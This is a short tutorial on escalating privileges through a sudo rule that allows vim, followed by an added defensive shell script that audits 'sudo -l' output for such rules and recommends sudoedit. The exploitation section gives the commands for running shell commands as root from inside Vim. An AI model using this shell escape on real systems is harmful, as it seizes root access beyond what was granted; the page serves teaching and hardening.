Sudo Vim Privilege Escalation

A sudo rule that lets a user run the "vim" command might be vulnerable to privilege escalation (PrivEsc).

Investigation

sudo -l

(ALL) NOPASSWD: vim example.txt

If we can execute the "vim" command as root, we can execute shell commands from inside the Vim editor.

Exploitation

Simply run the "vim" command as root.

sudo vim example.txt

In the Vim editor, we can run shell commands as root.

:r!whoami
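
To find such rules from the defender's side, the following added example (not part of the original page) scans `sudo -l` output for vim entries that lack the NOEXEC tag. The function name audit_sudo_vim, the alias list (vi, view, vimdiff) and the sample user and host names are assumptions made for illustration.

```sh
#!/bin/sh
# Added example, not from the original page: flag `sudo -l` rules that allow
# vim without the NOEXEC tag, i.e. rules where the :! shell escape works.
# Assumes the usual `sudo -l` layout "(runas) TAG: TAG: command args, ...".
# Reads that output on stdin; returns 0 if a risky rule was found, else 1.
audit_sudo_vim() {
  found=1
  while IFS= read -r line; do
    set -f; set -- $line; set +f
    case ${1-} in "("*) ;; *) continue ;; esac   # rule lines start with (runas)
    runas=${line#*"("}; runas=${runas%%")"*}
    rest=${line#*")"}
    noexec=no
    while [ -n "$rest" ]; do
      item=${rest%%,*}                            # next comma-separated command
      case $rest in *,*) rest=${rest#*,} ;; *) rest= ;; esac
      set -f; set -- $item; set +f
      while [ $# -gt 0 ]; do                      # peel tags; NOEXEC holds until EXEC
        case $1 in
          NOEXEC:) noexec=yes ;;
          EXEC:) noexec=no ;;
          [A-Z]*:) ;;
          *) break ;;
        esac
        shift
      done
      [ $# -gt 0 ] || continue
      case ${1##*/} in
        vim|vi|view|vimdiff)                      # vim and its usual aliases
          if [ "$noexec" = no ]; then
            echo "RISK: ($runas) '$*' permits shell escapes; prefer sudoedit"
            found=0
          fi ;;
      esac
    done
  done
  return $found
}

# Constructed sample input; in practice run: sudo -l | audit_sudo_vim
audit_sudo_vim <<'EOF' || true
User bob may run the following commands on host:
    (ALL) NOPASSWD: vim example.txt
    (root) NOEXEC: NOPASSWD: /usr/bin/vim /etc/hosts
    (root) NOPASSWD: sudoedit /etc/motd
EOF
```

NOEXEC only blocks the shell escape; Vim running as root can still open and write other files, so sudoedit is the stronger fix.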
